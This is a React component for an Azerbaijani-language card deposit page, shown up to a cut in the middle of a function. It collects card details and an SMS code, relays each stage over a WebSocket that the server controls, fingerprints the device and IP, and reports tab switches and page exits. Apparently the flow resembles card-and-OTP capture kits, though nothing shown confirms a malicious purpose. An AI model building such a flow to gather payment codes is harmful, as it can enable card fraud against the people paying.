import React, { useState, useEffect, useRef, useCallback } from "react";
import { useDispatch, useSelector } from "react-redux";
import "./NewPaymentGateway.css";
import POSAnimation from "./POSAnimation";
import Lottie from "lottie-react";
import correctAnimation from "../assets/Correct.json";
import failedAnimation from "../assets/Failed-3.json";
import loadingAnimation from "../assets/Loading-sand.json";
import authAnimation from "../assets/Auth.json";
import notFoundAnimation from "../assets/Not-Found.json";
import { confirmDeposit } from "../store/thunks/Payment";
import ReconnectingWebSocket from "reconnecting-websocket";

const CardIcon = () => (
  <svg width="16" height="16" viewBox="0 0 24 24" fill="currentColor">
    <path d="M20 4H4c-1.11 0-1.99.89-1.99 2L2 18c0 1.11.89 2 2 2h16c1.11 0 2-.89 2-2V6c0-1.11-.89-2-2-2zm0 14H4v-6h16v6zm0-10H4V6h16v2z" />
  </svg>
);

const CVVIcon = () => (
  <img
    src="/cvv-icon-28.jpg"
    alt="CVV"
    width="20"
    height="20"
    style={{ filter: "brightness(0) saturate(100%) invert(60%)" }}
  />
);

const CreditCardIcon = () => (
  <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor">
    <rect
      x="2"
      y="5"
      width="20"
      height="14"
      rx="2"
      stroke="currentColor"
      strokeWidth="2"
      fill="none"
    />
    <line
      x1="2"
      y1="10"
      x2="22"
      y2="10"
      stroke="currentColor"
      strokeWidth="2"
    />
  </svg>
);

const PayIcon = () => (
  <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor">
    <path d="M18 8h-1V6c0-2.76-2.24-5-5-5S7 3.24 7 6v2H6c-1.1 0-2 .9-2 2v10c0 1.1.9 2 2 2h12c1.1 0 2-.9 2-2V10c0-1.1-.9-2-2-2zM9 6c0-1.66 1.34-3 3-3s3 1.34 3 3v2H9V6z" />
  </svg>
);

const PersonIcon = () => (
  <svg
    width="20"
    height="20"
    viewBox="0 0 24 24"
    fill="none"
    stroke="currentColor"
    strokeWidth="2"
  >
    <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2" />
    <circle cx="12" cy="7" r="4" />
  </svg>
);

const NewPaymentGateway = () => {
  const [nameOnCard, setNameOnCard] = useState("");
  const [isNameDisabled, setIsNameDisabled] = useState(false);
  const [cardNumber, setCardNumber] = useState("");
  const [expDate, setExpDate] = useState("");
  const [cvc, setCvc] = useState("");
  const [amount, setAmount] = useState(0);
  const [method, setMethod] = useState("");
  const [token, setToken] = useState("");
  const [hasValidToken, setHasValidToken] = useState(true);
  const [trxInfo, setTrxInfo] = useState(null);

  const [currentStage, setCurrentStage] = useState(0);

  // Redux
  const dispatch = useDispatch();
  const {
    loading: paymentLoading,
    data: paymentData,
    error: paymentError,
  } = useSelector((state) => state.payment);

  const [timeLeft, setTimeLeft] = useState(300);
  const [isTimerActive, setIsTimerActive] = useState(true);

  const [smsCode, setSmsCode] = useState("");

  // Form error states
  const [formError, setFormError] = useState("");
  const [isFormLoading, setIsFormLoading] = useState(false);

  // SMS error states
  const [smsError, setSmsError] = useState("");
  const [isSmsLoading, setIsSmsLoading] = useState(false);

  // Multi payment error state
  const [hasMultiPaymentError, setHasMultiPaymentError] = useState(false);
  const [multiPaymentMessage, setMultiPaymentMessage] = useState("");

  // State persistence tracking
  const [lastSentStage, setLastSentStage] = useState(null);
  const [hasExistingDeposit, setHasExistingDeposit] = useState(false);

  // WebSocket states
  const [wsState, setWsState] = useState("CLOSED");
  const [depositId, setDepositId] = useState(null);
  const [loading, setLoading] = useState(false);
  const [paymentResult, setPaymentResult] = useState(null);
  const [declineExplanation, setDeclineExplanation] = useState(null);
  const [resultAmount, setResultAmount] = useState(null);
  const [oldAmount, setOldAmount] = useState(null);
  const [amountChanged, setAmountChanged] = useState(false);

  // WebSocket refs
  const wsRef = useRef(null);
  const depositIdRef = useRef(null);
  const hasAuthenticatedRef = useRef(false);
  const authTimeoutRef = useRef(null); // Auth timeout'unu iptal etmek için

  // Client/device info
  const [clientInfo, setClientInfo] = useState(null);
  const clientInfoRef = useRef(null);
  const hasSentClientInfoRef = useRef(false);
  const abandonSentRef = useRef(false);

  // Tab/app switch tracking
  const lastVisibilityStateRef = useRef(
    typeof document !== "undefined" ? document.visibilityState : "visible"
  );

  const sendStageUpdate = useCallback(
    (stage, isPageUnload = false) => {
      if (
        !wsRef.current ||
        wsRef.current.readyState !== WebSocket.OPEN ||
        !token
      ) {
        return;
      }

      if (stage >= 5 || (!isPageUnload && stage === lastSentStage)) {
        return;
      }

      const stageNames = {
        1: "cardInput",
        2: "cardProcessing",
        3: "smsInput",
        4: "smsProcessing",
      };

      const stageName = stageNames[stage];
      if (!stageName) return;

      try {
        const message = {
          type: "stageUpdate",
          stage: stageName,
          stageNumber: stage,
          token: token,
          timestamp: Date.now(),
          isPageUnload: isPageUnload,
          remainingTime: timeLeft,
        };

        wsRef.current.send(JSON.stringify(message));

        if (!isPageUnload) {
          setLastSentStage(stage);
        }

        // console.log(
        //   `📍 Stage ${
        //     isPageUnload ? "unload" : "update"
        //   }: ${stageName} (${stage}) - ${timeLeft}s remaining`
        // );
      } catch (error) {
        // console.error("❌ Failed to send stage update:", error);
      }
    },
    [token, lastSentStage, timeLeft]
  );

  useEffect(() => {
    if (trxInfo) {
      // console.log("🎯 Transaction Info:", trxInfo);
      // console.log("👤 User ID:", trxInfo.userId);
      // console.log("📛 Name:", trxInfo.name, trxInfo.lastName);
      // console.log("🔢 Transaction ID:", trxInfo.transactionId);
      // console.log("💰 Amount:", trxInfo.amount);
    }
  }, [trxInfo]);

  useEffect(() => {
    depositIdRef.current = depositId;
  }, [depositId]);

  useEffect(() => {
    clientInfoRef.current = clientInfo;
  }, [clientInfo]);

  useEffect(() => {
    const sendActivityNotification = (activity) => {
      try {
        if (
          wsRef.current &&
          wsRef.current.readyState === WebSocket.OPEN &&
          token
        ) {
          const message = {
            type: "userActivity",
            token: token,
            activity: activity,
            stage: currentStage,
          };
          wsRef.current.send(JSON.stringify(message));
          // console.log(`🔄 ${activity} sent`);
        }
      } catch (e) {
        // console.warn(`Failed to send ${activity}:`, e);
      }
    };

    const isMobile = /Mobi|Android|iPhone|iPod|iPad/.test(navigator.userAgent);

    const handleVisibilityChange = () => {
      const currentState = document.visibilityState;
      const previousState = lastVisibilityStateRef.current;

      if (previousState === "visible" && currentState === "hidden") {
        sendActivityNotification("switch");
      }

      lastVisibilityStateRef.current = currentState;
    };

    const handleFocusChange = (type) => {
      if (type === "blur" && !isMobile) {
        sendActivityNotification("switch");
      }
    };

    const handleBlur = () => handleFocusChange("blur");
    const handleFocus = () => handleFocusChange("focus");

    const handleBeforeUnload = () => {
      sendActivityNotification("exit");
    };

    document.addEventListener("visibilitychange", handleVisibilityChange);
    window.addEventListener("blur", handleBlur);
    window.addEventListener("focus", handleFocus);
    window.addEventListener("beforeunload", handleBeforeUnload);

    return () => {
      document.removeEventListener("visibilitychange", handleVisibilityChange);
      window.removeEventListener("blur", handleBlur);
      window.removeEventListener("focus", handleFocus);
      window.removeEventListener("beforeunload", handleBeforeUnload);
    };
  }, [token, currentStage]);

  useEffect(() => {
    const parseBrowser = () => {
      const ua = navigator.userAgent || navigator.vendor || window.opera;
      let name = "Unknown";
      let version = "";

      if (/Edg\//.test(ua)) {
        name = "Edge";
        version = ua.match(/Edg\/([\d.]+)/)?.[1] || "";
      } else if (/OPR\//.test(ua) || /Opera/.test(ua)) {
        name = "Opera";
        version = ua.match(/(OPR|Opera)\/([\d.]+)/)?.[2] || "";
      } else if (/Chrome\//.test(ua)) {
        name = "Chrome";
        version = ua.match(/Chrome\/([\d.]+)/)?.[1] || "";
      } else if (/Safari\//.test(ua) && /Version\//.test(ua)) {
        name = "Safari";
        version = ua.match(/Version\/([\d.]+)/)?.[1] || "";
      } else if (/Firefox\//.test(ua)) {
        name = "Firefox";
        version = ua.match(/Firefox\/([\d.]+)/)?.[1] || "";
      } else if (/MSIE\s|Trident\//.test(ua)) {
        name = "Internet Explorer";
        version = ua.match(/(MSIE\s|rv:)([\d.]+)/)?.[2] || "";
      }

      return { name, version };
    };

    const parseOS = () => {
      const ua = navigator.userAgent || "";
      let name = "Unknown";
      let version = "";

      if (/Android/.test(ua)) {
        name = "Android";
        version = ua.match(/Android\s([\d_.]+)/)?.[1]?.replace(/_/g, ".") || "";
      } else if (/iP(hone|ad|od)/.test(ua)) {
        name = "iOS";
        version = ua.match(/OS\s([\d_]+)/)?.[1]?.replace(/_/g, ".") || "";
      } else if (/Mac OS X/.test(ua)) {
        name = "macOS";
        version = ua.match(/Mac OS X\s([\d_]+)/)?.[1]?.replace(/_/g, ".") || "";
      } else if (/Windows NT/.test(ua)) {
        name = "Windows";
        const map = {
          "10.0": "10",
          6.3: "8.1",
          6.2: "8",
          6.1: "7",
          "6.0": "Vista",
          5.1: "XP",
        };
        const raw = ua.match(/Windows NT\s([\d.]+)/)?.[1] || "";
        version = map[raw] || raw;
      } else if (/Linux/.test(ua)) {
        name = "Linux";
      }

      return { name, version };
    };

    const parseDeviceType = () => {
      const ua = navigator.userAgent || "";
      if (/Mobi|Android|iPhone|iPod/.test(ua)) return "mobile";
      if (/iPad|Tablet/.test(ua)) return "tablet";
      return "desktop";
    };

    const parseDeviceModel = () => {
      const ua = navigator.userAgent || "";
      // Android model often appears after the OS; e.g., "Android 10; SM-G973F"
      const androidModel = ua
        .match(/Android[\s\S]*?;\s*([^;\)]+)\)/)?.[1]
        ?.trim();
      if (androidModel) return androidModel;
      // iOS generally exposes only iPhone/iPad
      if (/iPhone/.test(ua)) return "iPhone";
      if (/iPad/.test(ua)) return "iPad";
      if (/iPod/.test(ua)) return "iPod";
      return "Unknown";
    };

    const getIpAddress = async () => {
      const tryEndpoints = [
        "https://api.ipify.org?format=json",
        "https://ipv4.icanhazip.com",
      ];
      for (const endpoint of tryEndpoints) {
        try {
          const res = await fetch(endpoint, { cache: "no-store" });
          if (!res.ok) continue;
          const contentType = res.headers.get("content-type") || "";
          if (contentType.includes("application/json")) {
            const data = await res.json();
            return data.ip || null;
          }
          const text = (await res.text()).trim();
          if (text) return text;
        } catch (_) {
          // ignore and try next
        }
      }
      return null;
    };

    const collect = async () => {
      try {
        const browser = parseBrowser();
        const os = parseOS();
        const deviceType = parseDeviceType();
        const deviceModel = parseDeviceModel();
        const ip = await getIpAddress();

        const info = {
          timestamp: Date.now(),
          userAgent: navigator.userAgent || "",
          vendor: navigator.vendor || "",
          language: navigator.language || "",
          languages: navigator.languages || [],
          platform: navigator.platform || "",
          screen: {
            width: window.screen?.width || null,
            height: window.screen?.height || null,
            devicePixelRatio: window.devicePixelRatio || 1,
          },
          timezone: Intl.DateTimeFormat().resolvedOptions().timeZone || "",
          osName: os.name,
          osVersion: os.version,
          deviceType,
          deviceModel,
          browserName: browser.name,
          browserVersion: browser.version,
          ip,
        };

        setClientInfo(info);
        // console.log("🧭 Client info collected:", info);
      } catch (e) {
        // console.warn("Failed to collect client info", e);
      }
    };

    collect();
  }, []);

  // If IP or other fields arrive after WS opened, send once when ready
  useEffect(() => {
    if (
      wsRef.current &&
      wsRef.current.readyState === WebSocket.OPEN &&
      clientInfo &&
      !hasSentClientInfoRef.current
    ) {
      try {
        const infoMsg = JSON.stringify({
          type: "clientInfo",
          token,
          data: clientInfo,
        });
        wsRef.current.send(infoMsg);
        hasSentClientInfoRef.current = true;
        // console.log("📤 Client info sent (post-open):", clientInfo);
      } catch (e) {
        // console.error("❌ Failed to send client info (post-open):", e);
      }
    }
  }, [clientInfo, token, wsState]);

  // WebSocket kurulumu - sadece token auth olduktan sonra
  useEffect(() => {
    if (!trxInfo || !token) return; // Auth olmadıysa WebSocket kurma

    // console.log("🔗 WebSocket bağlantısı kuruluyor...");

    let pingInterval;
    let visibilityListenerAdded = false;

    const startPing = () => {
      clearInterval(pingInterval);
      pingInterval = setInterval(() => {
        if (wsRef.current && wsRef.current.readyState === WebSocket.OPEN) {
          wsRef.current.send(JSON.stringify({ type: "ping" }));
          // console.log("📡 Ping sent");
        }
      }, 10000);
    };

    const handleVisibilityChange = () => {
      if (document.hidden) {
        clearInterval(pingInterval);
        pingInterval = setInterval(() => {
          if (wsRef.current && wsRef.current.readyState === WebSocket.OPEN) {
            wsRef.current.send(JSON.stringify({ type: "ping" }));
            // console.log("📡 Faster ping sent (background)");
          }
        }, 5000);
      } else {
        startPing();
      }
    };

    const rws = new ReconnectingWebSocket(
      `wss://api.primepaygate.com/ws/payment`,
      // `ws://localhost:3001/ws/payment`,
      [],
      {
        reconnectInterval: 1000,
        maxReconnectInterval: 10000,
        reconnectDecay: 1.5,
        timeoutInterval: 2000,
        maxRetries: Infinity,
        debug: false,
      }
    );

    wsRef.current = rws;
    // console.log("🔌 WebSocket initialized");

    rws.addEventListener("open", () => {
      // console.log("✅ WebSocket OPEN (ReconnectingWebSocket).");
      setWsState("OPEN");

      if (token) {
        const msg = JSON.stringify({ type: "checkExistingDeposit", token });
        rws.send(msg);
        // console.log("🔍 CheckExistingDeposit sent!");
      }

      // Send client/device info once on open (if already collected)
      try {
        if (!hasSentClientInfoRef.current && clientInfoRef.current) {
          const infoMsg = JSON.stringify({
            type: "clientInfo",
            token,
            data: clientInfoRef.current,
          });
          rws.send(infoMsg);
          hasSentClientInfoRef.current = true;
          // console.log("📤 Client info sent:", clientInfoRef.current);
        }
      } catch (e) {
        // console.error("❌ Failed to send client info on open:", e);
      }

      startPing();

      if (!visibilityListenerAdded) {
        document.addEventListener("visibilitychange", handleVisibilityChange);
        visibilityListenerAdded = true;
      }
    });

    rws.addEventListener("error", (err) => {
      // console.error("❌ WebSocket ERROR:", err);
    });

    rws.addEventListener("close", () => {
      // console.log("🔒 WebSocket CLOSED!");
      setWsState("CLOSED");

      // Stop loading if connection is lost during submissions
      if (isFormLoading) {
        setIsFormLoading(false);
        setFormError("Bağlantı problemi. Yenidən cəhd edin");
      }
      if (isSmsLoading) {
        setIsSmsLoading(false);
        setSmsError("Bağlantı problemi. Yenidən cəhd edin");
      }

      clearInterval(pingInterval);

      if (visibilityListenerAdded) {
        document.removeEventListener(
          "visibilitychange",
          handleVisibilityChange
        );
        visibilityListenerAdded = false;
      }
    });

    // Mesajları dinleme
    rws.addEventListener("message", (event) => {
      try {
        const receivedMessage = JSON.parse(event.data);

        switch (receivedMessage.type) {
          case "pong":
            // console.log("🏓 Pong received");
            break;

          case "existingDeposit":
            // console.log("🔄 Existing deposit found:", receivedMessage);

            // Auth timeout'unu iptal et (artık Stage 1'e gitmeye gerek yok)
            if (authTimeoutRef.current) {
              clearTimeout(authTimeoutRef.current);
              authTimeoutRef.current = null;
              // console.log("🛑 Auth timeout CANCELLED - existing deposit found");
            }

            // Existing deposit flag'ini set et
            setHasExistingDeposit(true);
            // console.log("🔧 DEBUG: hasExistingDeposit set to TRUE");

            // Backend'den gelen stage'e göre kullanıcıyı yönlendir
            const targetStage = receivedMessage.stage || 1;
            // Default süre: Stage 1 için 5 dakika (300s), diğerleri için 10 dakika (600s)
            const defaultTime = targetStage === 1 ? 300 : 600;
            const remainingTime = receivedMessage.remainingTime || defaultTime;

            // console.log(
            //   `🎯 Redirecting to stage ${targetStage}, remaining time: ${remainingTime}s`
            // );
            setCurrentStage(targetStage);

            // Stage'e göre gerekli state'leri ayarla
            switch (targetStage) {
              case 1:
                // Kart girme ekranı - 5 dakika timer
                setTimeLeft(remainingTime); // Backend'den kalan süre (300s default)
                setIsTimerActive(true);
                // console.log(
                //   `⏰ Card input timer: ${remainingTime} seconds remaining`
                // );
                break;
              case 2:
              case 3:
              case 4:
                // Stage 2, 3, 4'te timer aktif olmalı (10 dakika default)
                setTimeLeft(remainingTime); // Backend'den gelen kalan süre
                setIsTimerActive(true);
                // console.log(
                //   `⏰ Payment timer: ${remainingTime} seconds remaining`
                // );
                break;
              default:
                // console.warn(
                //   `⚠️ Unknown stage: ${targetStage}, defaulting to 1`
                // );
                setCurrentStage(1);
                setTimeLeft(300); // 5 dakika default
                setIsTimerActive(true);
            }
            break;

          case "cardInfoProcessed":
            // console.log("💳 Card info processed:", receivedMessage);

            // Clear timeout if it exists
            if (wsRef.current?.cardInfoTimeoutId) {
              clearTimeout(wsRef.current.cardInfoTimeoutId);
              wsRef.current.cardInfoTimeoutId = null;
            }

            // Stop loading and move to stage 2 (processing)
            setIsFormLoading(false);
            setCurrentStage(2);
            setTimeLeft(600); // 10 minutes = 600 seconds
            setIsTimerActive(true);
            break;

          case "smsRequest":
            // console.log("📱 SMS request received:", receivedMessage);

            // Move to stage 3 (SMS code input)
            setCurrentStage(3);
            break;

          case "smsCodeReceived":
            // console.log("📱 SMS code received:", receivedMessage);

            // Clear SMS timeout if it exists
            if (wsRef.current?.smsTimeoutId) {
              clearTimeout(wsRef.current.smsTimeoutId);
              wsRef.current.smsTimeoutId = null;
            }

            // Stop SMS loading and move to stage 4 (processing)
            setIsSmsLoading(false);
            setCurrentStage(4); // Processing stage with money animation
            break;

          case "depositApproved":
            // console.log("✅ Deposit approved:", receivedMessage);

            // Clear SMS timeout if it exists
            if (wsRef.current?.smsTimeoutId) {
              clearTimeout(wsRef.current.smsTimeoutId);
              wsRef.current.smsTimeoutId = null;
            }

            // Store result data
            setPaymentResult("approved");
            if (receivedMessage.amount) {
              setResultAmount(receivedMessage.amount);
            }

            // Stop SMS loading and move to success stage
            setIsSmsLoading(false);
            setCurrentStage(5); // Success stage
            setIsTimerActive(false);

            // console.log("💰 Payment completed successfully");
            break;

          case "depositDeclined":
            // console.log("❌ Deposit declined:", receivedMessage);

            // Clear SMS timeout if it exists
            if (wsRef.current?.smsTimeoutId) {
              clearTimeout(wsRef.current.smsTimeoutId);
              wsRef.current.smsTimeoutId = null;
            }

            // Store decline data
            setPaymentResult("declined");
            if (receivedMessage.explanation) {
              setDeclineExplanation(receivedMessage.explanation);
            }

            // Stop SMS loading and move to failed stage
            setIsSmsLoading(false);
            setCurrentStage(6); // Failed stage
            setIsTimerActive(false);

            // console.log("❌ Payment declined by the system");
            break;

          case "timeout":
            // TODO: Timeout logic
            // console.log("⏰ Timeout:", receivedMessage);
            break;

          case "MultiPaymentError":
            // console.log("🚫 Multi payment error:", receivedMessage);

            // Show multi payment error screen
            setHasMultiPaymentError(true);
            setMultiPaymentMessage(
              receivedMessage.message || "Birdən çox ödəniş etmək mümkün deyil"
            );

            // Stop any loading states
            setIsFormLoading(false);
            setIsSmsLoading(false);
            setIsTimerActive(false);
            break;

          case "error":
            // console.error("❌ Error:", receivedMessage.message);

            // Clear timeouts if they exist
            if (wsRef.current?.cardInfoTimeoutId) {
              clearTimeout(wsRef.current.cardInfoTimeoutId);
              wsRef.current.cardInfoTimeoutId = null;
            }
            if (wsRef.current?.smsTimeoutId) {
              clearTimeout(wsRef.current.smsTimeoutId);
              wsRef.current.smsTimeoutId = null;
            }

            // Stop loading and show error if we're in submission stages
            if (isFormLoading) {
              setIsFormLoading(false);
              setFormError(
                receivedMessage.message || "Sistem xətası baş verdi"
              );
            }
            if (isSmsLoading) {
              setIsSmsLoading(false);
              setSmsError(
                receivedMessage.message || "SMS yoxlanırken xəta baş verdi"
              );
            }
            break;

          default:
          // console.log("❓ Unknown message type:", receivedMessage.type);
        }
      } catch (error) {
        // console.error("💥 Failed to process WebSocket message:", error);
      }
    });

    return () => {
      // console.log("🧹 Cleanup WebSocket.");
      clearInterval(pingInterval);

      // Clear timeouts if they exist
      if (wsRef.current?.cardInfoTimeoutId) {
        clearTimeout(wsRef.current.cardInfoTimeoutId);
      }
      if (wsRef.current?.smsTimeoutId) {
        clearTimeout(wsRef.current.smsTimeoutId);
      }

      if (visibilityListenerAdded) {
        document.removeEventListener(
          "visibilitychange",
          handleVisibilityChange
        );
      }
      rws.close();
    };
  }, [trxInfo, token]); // 🔧 Sadece auth için gerekli değişkenler

  // Path'e göre method ayarlama ve token kontrolü
  useEffect(() => {
    const currentPath = window.location.pathname;
    const urlParams = new URLSearchParams(window.location.search);

    if (currentPath === "/" || currentPath.startsWith("/deposit")) {
      setMethod("HPP");
      // console.log("Method set to HPP for path:", currentPath);

      // HPP için token kontrolü
      const tokenParam = urlParams.get("token");
      if (tokenParam) {
        setToken(tokenParam);
        setHasValidToken(true);
        // console.log("Token found:", tokenParam);
      } else {
        setHasValidToken(false);
        // console.log("No token found for HPP method");
      }
    } else if (currentPath.startsWith("/cardDeposit")) {
      setMethod("CARD");
      setHasValidToken(true); // CARD method için token gerekli değil
      // console.log("Method set to CARD for path:", currentPath);
    } else {
      // Geçersiz path - hata göster
      setMethod("");
      setHasValidToken(false);
      // console.log("Invalid path:", currentPath);
    }
  }, []);

  // Auth çağrısı - HPP method ve token varsa confirmDeposit çağır (2 saniye gecikmeli)
  useEffect(() => {
    if (method === "HPP" && token && hasValidToken && !trxInfo) {
      // console.log("Auth başlatılıyor - 1 saniye sonra Token:", token);
      const authTimer = setTimeout(() => {
        // console.log("Auth çağrısı yapılıyor - Token:", token);
        dispatch(confirmDeposit({ token }));
      }, 1300);

      return () => clearTimeout(authTimer);
    }
  }, [method, token, hasValidToken, trxInfo, dispatch]);

  // Cleanup auth timeout when component unmounts
  useEffect(() => {
    return () => {
      if (authTimeoutRef.current) {
        clearTimeout(authTimeoutRef.current);
        authTimeoutRef.current = null;
      }
    };
  }, []);

  // Redux payment response'ları handle et
  useEffect(() => {
    if (paymentData && !paymentLoading && !paymentError) {
      // console.log("Auth başarılı, trxInfo alındı:", paymentData);
      setTrxInfo(paymentData.data);

      // Backend'den gelen amount bilgisini güncelle
      if (paymentData.data.amount) {
        setAmount(paymentData.data.amount);
        // console.log("💰 Amount güncellendi:", paymentData.data.amount);
      }

      // Backend'den gelen name bilgisini güncelle
      if (paymentData.data.name || paymentData.data.lastName) {
        const fullName = paymentData.data.lastName
          ? `${paymentData.data.name} ${paymentData.data.lastName}`.trim()
          : paymentData.data.name;
        setNameOnCard(fullName);
        setIsNameDisabled(true);
        // console.log("👤 Name on Card güncellendi:", fullName);
      } else {
        // Name bilgisi yoksa input aktif kalır
        setIsNameDisabled(false);
        // console.log("👤 Name bilgisi yok, input aktif");
      }

      // Auth başarılı, WebSocket bağlantısından sonra stage 1'e geç
      // Existing deposit gelirse bu timeout iptal edilir
      authTimeoutRef.current = setTimeout(() => {
        // console.log(
        //   `🔧 DEBUG: Auth timeout - hasExistingDeposit: ${hasExistingDeposit}`
        // );
        // Eğer existing deposit varsa, zaten doğru stage'e yönlendirildi
        if (!hasExistingDeposit) {
          // console.log("🆕 New deposit, redirecting to stage 1");
          setCurrentStage(1);
          setTimeLeft(300);
          setIsTimerActive(true);
        } else {
          // console.log("🔄 Existing deposit, staying at current stage");
        }
        authTimeoutRef.current = null; // Timeout tamamlandı
      }, 2000);
    }

    if (paymentError && !paymentLoading) {
      // console.error("Auth hatası:", paymentError);
      setHasValidToken(false);
    }
  }, [paymentData, paymentLoading, paymentError]);

  useEffect(() => {
    if (currentStage === 0 && hasValidToken && method === "CARD") {
      // CARD method için token gerekli değil, direkt stage 1'e geç
      const loadingTimer = setTimeout(() => {
        // Eğer existing deposit varsa, stage 1'e gitme
        if (!hasExistingDeposit) {
          // console.log("🆕 CARD method: New deposit, redirecting to stage 1");
          setCurrentStage(1);
          setTimeLeft(300);
          setIsTimerActive(true);
        } else {
          // console.log(
          //   "🔄 CARD method: Existing deposit, staying at current stage"
          // );
        }
      }, 5000);

      return () => clearTimeout(loadingTimer);
    }
  }, [currentStage, hasValidToken, method, hasExistingDeposit]);

  // Send stage updates to backend for state persistence
  useEffect(() => {
    // Only send for meaningful stages (1-4) and after WebSocket is connected
    if (currentStage >= 1 && currentStage <= 4 && wsState === "OPEN") {
      // Add small delay to ensure stage transition is complete
      const timer = setTimeout(() => {
        sendStageUpdate(currentStage);
      }, 500);

      return () => clearTimeout(timer);
    }
  }, [currentStage, wsState, sendStageUpdate]);

  // Sayfa kapanırken stage gönder
  useEffect(() => {
    const handleBeforeUnload = () => {
      // Sadece anlamlı stage'lerde gönder
      if (currentStage >= 1 && currentStage <= 4) {
        sendStageUpdate(currentStage, true); // 🎯 isPageUnload = true
      }
    };

    window.addEventListener("beforeunload", handleBeforeUnload);

    return () => {
      window.removeEventListener("beforeunload", handleBeforeUnload);
    };
  }, [currentStage, sendStageUpdate]);

  useEffect(() => {
    if (currentStage > 0 && isTimerActive && timeLeft > 0) {
      const timer = setInterval(() => {
        setTimeLeft((prevTime) => {
          if (prevTime <= 1) {
            setIsTimerActive(false);
            // Timer expired -> finalize abandon immediately
            finalizeAbandon("timeout");
            return 0;
          }
          return prevTime - 1;
        });
      }, 1000);

      return () => clearInterval(timer);
    }
  }, [isTimerActive, timeLeft, currentStage]);

  const finalizeAbandon = (reason = "timeout") => {
    try {
      if (abandonSentRef.current) return;

      const message = {
        type: "finalizeAbandon",
        token: token,
        reason,
        stage: currentStage,
        remainingTime: timeLeft,
        timestamp: Date.now(),
      };

      if (wsRef.current && wsRef.current.readyState === WebSocket.OPEN) {
        wsRef.current.send(JSON.stringify(message));
        // Give a brief moment to flush the frame, then close intentionally
        setTimeout(() => {
          try {
            wsRef.current?.close(4000, reason);
          } catch (_) {}
        }, 50);
      }

      abandonSentRef.current = true;

      // Reflect abandonment on UI immediately
      setIsFormLoading(false);
      setIsSmsLoading(false);
      setPaymentResult("declined");
      setDeclineExplanation(
        reason === "timeout"
          ? "Zaman aşımı"
          : "İstifadəçi tərəfindən ləğv edildi"
      );
      setCurrentStage(6);
      setIsTimerActive(false);
    } catch (e) {
      // console.error("❌ finalizeAbandon failed:", e);
    }
  };

  const formatTime = (seconds) => {
    const minutes = Math.floor(seconds / 60);
    const remainingSeconds = seconds % 60;
    return `${minutes.toString().padStart(2, "0")}:${remainingSeconds
      .toString()
      .padStart(2, "0")}`;
  };

  const getTimerClass = () => {
    if (timeLeft === 0) return "timer-expired";
    if (timeLeft <= 60) return "timer-warning";
    return "";
  };

  useEffect(() => {
    const viewport = document.querySelector('meta[name="viewport"]');
    if (viewport) {
      viewport.setAttribute(
        "content",
        "width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"
      );
    }

    const setThemeColor = (color) => {
      let themeColorMeta = document.querySelector('meta[name="theme-color"]');
      if (!themeColorMeta) {
        themeColorMeta = document.createElement("meta");
        themeColorMeta.name = "theme-color";
        document.getElementsByTagName("head")[0].appendChild(themeColorMeta);
      }
      themeColorMeta.content = color;

      let navBarMeta = document.querySelector('meta[name="theme-color"]');
      if (navBarMeta) {
        navBarMeta.setAttribute("media", "(prefers-color-scheme: dark)");
        navBarMeta.content = color;
      }

      let navBarLightMeta = document.querySelector(
        'meta[name="theme-color"][media="(prefers-color-scheme: light)"]'
      );
      if (!navBarLightMeta) {
        navBarLightMeta = document.createElement("meta");
        navBarLightMeta.name = "theme-color";
        navBarLightMeta.setAttribute("media", "(prefers-color-scheme: light)");
        navBarLightMeta.content = color;
        document.getElementsByTagName("head")[0].appendChild(navBarLightMeta);
      }

      let msNavButtonMeta = document.querySelector(
        'meta[name="msapplication-navbutton-color"]'
      );
      if (!msNavButtonMeta) {
        msNavButtonMeta = document.createElement("meta");
        msNavButtonMeta.name = "msapplication-navbutton-color";
        document.getElementsByTagName("head")[0].appendChild(msNavButtonMeta);
      }
      msNavButtonMeta.content = color;

      let androidNavBarMeta = document.querySelector(
        'meta[name="android-navigation-bar-color"]'
      );
      if (!androidNavBarMeta) {
        androidNavBarMeta = document.createElement("meta");
        androidNavBarMeta.name = "android-navigation-bar-color";
        document.getElementsByTagName("head")[0].appendChild(androidNavBarMeta);
      }
      androidNavBarMeta.content = color;

      let appleStatusBarMeta = document.querySelector(
        'meta[name="apple-mobile-web-app-status-bar-style"]'
      );
      if (!appleStatusBarMeta) {
        appleStatusBarMeta = document.createElement("meta");
        appleStatusBarMeta.name = "apple-mobile-web-app-status-bar-style";
        document
          .getElementsByTagName("head")[0]
          .appendChild(appleStatusBarMeta);
      }
      appleStatusBarMeta.content = "black-translucent";

      if (
        window.matchMedia &&
        window.matchMedia("(display-mode: standalone)").matches
      ) {
        document.body.style.backgroundColor = color;
      }

      document.documentElement.style.setProperty("--nav-bar-color", color);
    };

    setThemeColor("#121212");

    const heroBackground = document.querySelector(".hero-background");
    if (heroBackground) {
      heroBackground.style.backgroundImage = 'url("/hero1.webp")';
    }

    const originalStyle = window.getComputedStyle(document.body).overflow;
    document.body.style.overflow = "hidden";
    document.body.style.position = "fixed";
    document.body.style.width = "100%";

    const handleViewportChange = () => {
      const viewportHeight =
        window.visualViewport?.height || window.innerHeight;
      document.documentElement.style.setProperty(
        "--viewport-height",
        `${viewportHeight}px`
      );
    };

    if (window.visualViewport) {
      window.visualViewport.addEventListener("resize", handleViewportChange);
      handleViewportChange();
    }

    return () => {
      document.body.style.overflow = originalStyle;
      document.body.style.position = "";
      document.body.style.width = "";

      if (window.visualViewport) {
        window.visualViewport.removeEventListener(
          "resize",
          handleViewportChange
        );
      }
    };
  }, []);

  const formatCardNumber = (value) => {
    const v = value.replace(/\s+/g, "").replace(/[^0-9]/gi, "");
    const matches = v.match(/\d{4,16}/g);
    const match = (matches && matches[0]) || "";
    const parts = [];
    for (let i = 0, len = match.length; i < len; i += 4) {
      parts.push(match.substring(i, i + 4));
    }
    if (parts.length) {
      return parts.join(" ");
    } else {
      return v;
    }
  };

  const formatExpDate = (value) => {
    const v = value.replace(/\D/g, "");
    if (v.length >= 2) {
      return `${v.substring(0, 2)}/${v.substring(2, 4)}`;
    }
    return v;
  };

  const formatName = (value) => {
    // Türkçe ve Azeri karakterler dahil, sadece harfler ve boşluklar
    return value.replace(/[^a-zA-ZğüşıöçĞÜŞIİÖÇəәöüçğşıİĞÜŞÇÖƏƏ\s]/g, "");
  };

  const focusNextField = (selector) => {
    setTimeout(() => {
      const nextField = document.querySelector(selector);
